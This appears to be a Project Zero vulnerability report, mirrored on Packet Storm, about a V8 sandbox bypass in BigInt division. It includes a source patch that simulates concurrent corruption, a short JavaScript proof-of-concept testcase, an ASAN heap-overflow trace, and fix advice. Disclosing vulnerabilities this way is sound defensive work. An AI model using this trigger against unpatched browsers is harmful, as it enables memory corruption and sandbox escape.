V8 Sandbox Bypass: BigInt Division Memory Corruption

Packet Storm ID: PACKETSTORM:219160
Published: 2026-04-17
Source: https://packetstorm.news/files/id/219160/ (download: https://packetstorm.news/download/219160)
CVE: none listed
CVSS: none assigned

Vulnerability Details

This is a variant of crbug.com/474041332. The issue there was that MultiplyFFT, an optimized version of integer multiplication for very large inputs, is not robust against concurrent modification of its input buffers, but was called from ProcessorImpl::FromStringLarge with a temporary buffer inside the sandbox. The fix was to switch the caller to instead supply an out-of-sandbox temporary buffer.

However, it seems that there is at least one other function that calls MultiplyFFT with in-sandbox buffers: DivideBurnikelZiegler, used during BigInt division. An excerpt of the function is shown below.

    void ProcessorImpl::DivideBurnikelZiegler(RWDigits Q, RWDigits R, Digits A,
                                              Digits B) {
      // Q, A, B are inside the sandbox during BigInt division
      // ...

      for (int i = t - 3; i >= 0; i--) {
        // ...
        RWDigits Qi(Q, i * n, n);  // [Inside the sandbox]
        bz.D2n1n(Qi, Ri, Z, B);    // This will end up calling MultiplyFFT
        if (should_terminate()) return;
      }

The call to D2n1n will eventually call MultiplyFFT with (a part of) Q as a temporary buffer. As such, the same bug can trigger on this code path.

Reproduction

Similar to issue 474041332, this bug is somewhat tricky to reproduce purely from JavaScript, but easily reproducible with a custom patch to the MultiplyFFT logic:

    diff --git a/BUILD.gn b/BUILD.gn
    index 953b81e72da..92103e87b1f 100644
    --- a/BUILD.gn
    +++ b/BUILD.gn
    @@ -7418,6 +7418,8 @@ v8_source_set("v8_bigint") {
       }

       configs = [ ":internal_config" ]
    +
    +  deps = [ ":v8_abseil" ]
     }

     v8_header_set("v8_heap_base_headers") {
    diff --git a/src/bigint/mul-fft.cc b/src/bigint/mul-fft.cc
    index f1d8bff8496..9840a82a20a 100644
    --- a/src/bigint/mul-fft.cc
    +++ b/src/bigint/mul-fft.cc
    @@ -7,10 +7,18 @@
     // Christoph Lüders: Fast Multiplication of Large Integers,
     // http://arxiv.org/abs/1503.04955

    +#include "src/sandbox/sandbox.h"
    +// Necessary hack to make it compile.
    +#undef CHECK
    +#undef DCHECK
    +#undef USE
    +
     #include "src/bigint/bigint-internal.h"
     #include "src/bigint/digit-arithmetic.h"
     #include "src/bigint/util.h"

    +#include <unistd.h>
    +
     namespace v8 {
     namespace bigint {

    @@ -479,6 +487,20 @@ class FFTContainer {

     inline void CopyAndZeroExtend(digit_t* dst, const digit_t* src,
                                   int digits_to_copy, size_t total_bytes) {
    +  // Simulate concurrent corruption inside the sandbox.
    +  uintptr_t src_addr = reinterpret_cast<uintptr_t>(src);
    +  if (internal::InsideSandbox(src_addr)) {
    +    for (int i = 0; i < digits_to_copy; i++) {
    +      if ((std::rand() % 10) == 0) {
    +        digit_t* writable_src = const_cast<digit_t*>(src);
    +        writable_src[i] = static_cast<digit_t>(-1);
    +      }
    +    }
    +  }
    +
       size_t bytes_to_copy = digits_to_copy * sizeof(digit_t);
       memcpy(dst, static_cast<const void*>(src), bytes_to_copy);
       memset(dst + digits_to_copy, 0, total_bytes - bytes_to_copy);

Then the issue can be observed with a simple testcase such as:

    const x = 123456n;
    const a = 31337n ** x;
    const b = 42n ** x;
    const c = a / b;

When run in an ASAN-enabled build:

    > cat out/sbxtst/args.gn
    is_debug = false
    dcheck_always_on = false
    is_asan = true
    target_cpu = "x64"

    > ./out/x64.sbxtst/d8 --sandbox-testing poc.js
    =================================================================
    ==250549==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7ed3b8818800 at pc 0x55ffcb3bacc4 bp 0x7ffff5cbf930 sp 0x7ffff5cbf928
    WRITE of size 8 at 0x7ed3b8818800 thread T0
        #0 0x55ffcb3bacc3 in v8::bigint::ProcessorImpl::MultiplyFFT(v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits) src/bigint/bigint.h:162:37
        #1 0x55ffcb3867fb in v8::bigint::ProcessorImpl::Multiply(v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits) src/bigint/bigint-internal.cc:49:10
        #2 0x55ffcb39b74c in v8::bigint::(anonymous namespace)::BZ::D3n2n(v8::bigint::RWDigits, v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits, v8::bigint::Digits) src/bigint/div-burnikel.cc:138:10
        #3 0x55ffcb399d2a in v8::bigint::(anonymous namespace)::BZ::D2n1n(v8::bigint::RWDigits, v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits) src/bigint/div-burnikel.cc:189:3
        #4 0x55ffcb398c89 in v8::bigint::ProcessorImpl::DivideBurnikelZiegler(v8::bigint::RWDigits, v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits) src/bigint/div-burnikel.cc:262:8
        #5 0x55ffcb387363 in v8::bigint::ProcessorImpl::Divide(v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits) src/bigint/bigint-internal.cc:81:5
        #6 0x55ffcb388e13 in v8::bigint::Processor::Divide(v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits) src/bigint/bigint-internal.cc:138:9
        #7 0x55ffc8aa7199 in v8::internal::MutableBigInt_AbsoluteDivAndCanonicalize(unsigned long, unsigned long, unsigned long) src/objects/bigint.cc:1549:56
        #8 0x55ffcdfe5724 in Builtins_BigIntDivideNoThrow setup-isolate-deserialize.cc
        #9 0x55ffce098333 in Builtins_DivHandler setup-isolate-deserialize.cc
        #10 0x55ffcdee8829 in Builtins_InterpreterEntryTrampoline setup-isolate-deserialize.cc
        #11 0x55ffcdee55db in Builtins_JSEntryTrampoline setup-isolate-deserialize.cc
        #12 0x55ffcdee532a in Builtins_JSEntry setup-isolate-deserialize.cc
        #13 0x55ffc805e1b2 in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, v8::internal::(anonymous namespace)::InvokeParams const&) src/execution/simulator.h:216:12
        #14 0x55ffc8060ad8 in v8::internal::Execution::CallScript(v8::internal::Isolate*, v8::internal::DirectHandle<v8::internal::JSFunction>, v8::internal::DirectHandle<v8::internal::Object>, v8::internal::DirectHandle<v8::internal::Object>) src/execution/execution.cc:542:10
        #15 0x55ffc7b6336b in v8::Script::Run(v8::Local<v8::Context>, v8::Local<v8::Data>) src/api/api.cc:2015:7
        #16 0x55ffc77312ee in v8::Shell::ExecuteString(v8::Isolate*, v8::Local<v8::String>, v8::Local<v8::String>, v8::Shell::ReportExceptions, v8::Global<v8::Value>*) src/d8/d8.cc:1037:44
        #17 0x55ffc777990d in v8::SourceGroup::Execute(v8::Isolate*) src/d8/d8.cc:5614:10
        #18 0x55ffc7789403 in v8::Shell::RunMainIsolate(v8::Isolate*, bool) src/d8/d8.cc:6633:37
        #19 0x55ffc7788712 in v8::Shell::RunMain(v8::Isolate*, bool) src/d8/d8.cc:6541:18
        #20 0x55ffc778d709 in v8::Shell::Main(int, char**) src/d8/d8.cc:7456:18
        #21 0x7fc3b967eca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

    0x7ed3b8818800 is located 0 bytes after 65536-byte region [0x7ed3b8808800,0x7ed3b8818800)
    allocated by thread T0 here:
        #0 0x55ffc76f784d in operator new[](unsigned long) (/usr/local/google/home/saelo/Workspace/v8/v8/out/sbxfuzz/d8+0x24a984d) (BuildId: e754bcc7c236b531)
        #1 0x55ffcb396fc6 in v8::bigint::ProcessorImpl::DivideBurnikelZiegler(v8::bigint::RWDigits, v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits) src/bigint/bigint-internal.h:140:43
        #2 0x55ffcb387363 in v8::bigint::ProcessorImpl::Divide(v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits) src/bigint/bigint-internal.cc:81:5
        #3 0x55ffcb388e13 in v8::bigint::Processor::Divide(v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits) src/bigint/bigint-internal.cc:138:9
        #4 0x55ffc8aa7199 in v8::internal::MutableBigInt_AbsoluteDivAndCanonicalize(unsigned long, unsigned long, unsigned long) src/objects/bigint.cc:1549:56
        #5 0x55ffcdfe5724 in Builtins_BigIntDivideNoThrow setup-isolate-deserialize.cc
        #6 0x55ffce098333 in Builtins_DivHandler setup-isolate-deserialize.cc
        #7 0x55ffcdee8829 in Builtins_InterpreterEntryTrampoline setup-isolate-deserialize.cc
        #8 0x55ffcdee55db in Builtins_JSEntryTrampoline setup-isolate-deserialize.cc
        #9 0x55ffcdee532a in Builtins_JSEntry setup-isolate-deserialize.cc
        #10 0x55ffc805e1b2 in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, v8::internal::(anonymous namespace)::InvokeParams const&) src/execution/simulator.h:216:12
        #11 0x55ffc8060ad8 in v8::internal::Execution::CallScript(v8::internal::Isolate*, v8::internal::DirectHandle<v8::internal::JSFunction>, v8::internal::DirectHandle<v8::internal::Object>, v8::internal::DirectHandle<v8::internal::Object>) src/execution/execution.cc:542:10
        #12 0x55ffc7b6336b in v8::Script::Run(v8::Local<v8::Context>, v8::Local<v8::Data>) src/api/api.cc:2015:7
        #13 0x55ffc77312ee in v8::Shell::ExecuteString(v8::Isolate*, v8::Local<v8::String>, v8::Local<v8::String>, v8::Shell::ReportExceptions, v8::Global<v8::Value>*) src/d8/d8.cc:1037:44
        #14 0x55ffc777990d in v8::SourceGroup::Execute(v8::Isolate*) src/d8/d8.cc:5614:10
        #15 0x55ffc7789403 in v8::Shell::RunMainIsolate(v8::Isolate*, bool) src/d8/d8.cc:6633:37
        #16 0x55ffc7788712 in v8::Shell::RunMain(v8::Isolate*, bool) src/d8/d8.cc:6541:18
        #17 0x55ffc778d709 in v8::Shell::Main(int, char**) src/d8/d8.cc:7456:18
        #18 0x7fc3b967eca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

    SUMMARY: AddressSanitizer: heap-buffer-overflow src/bigint/bigint.h:162:37 in v8::bigint::ProcessorImpl::MultiplyFFT(v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits)
    Shadow bytes around the buggy address:
      0x7ed3b8818580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ed3b8818600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ed3b8818680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ed3b8818700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ed3b8818780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x7ed3b8818800:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x7ed3b8818880: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x7ed3b8818900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x7ed3b8818980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x7ed3b8818a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x7ed3b8818a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==250549==ABORTING

    ## V8 sandbox violation detected!

Fix Recommendation

As an initial spot fix it may again be possible to use a different out-of-sandbox temporary buffer. However, the BigInt parsing logic has historically been somewhat fragile when exposed to in-sandbox corruption (see the other sandbox-related CHECKs in src/bigint). As such, for a more thorough fix I would recommend refactoring the code to avoid operating on both in-sandbox and out-of-sandbox memory at the same time, ideally by moving all dynamic memory allocations performed by this code into the sandbox. Afterwards, similar bugs would only lead to further in-sandbox corruption and the BigInt logic would therefore effectively behave like sandboxed code (not writing to out-of-sandbox memory).

Credit Information

Samuel Groß of Google Project Zero

Disclosure Deadline

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2026-04-26.

For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html

Issue summary

Tracker: https://crbug.com/478814654

This was fixed with https://crrev.com/c/7581282 which first shipped in Chrome 147.0.7727.24 (Stable channel).

Credit: saelo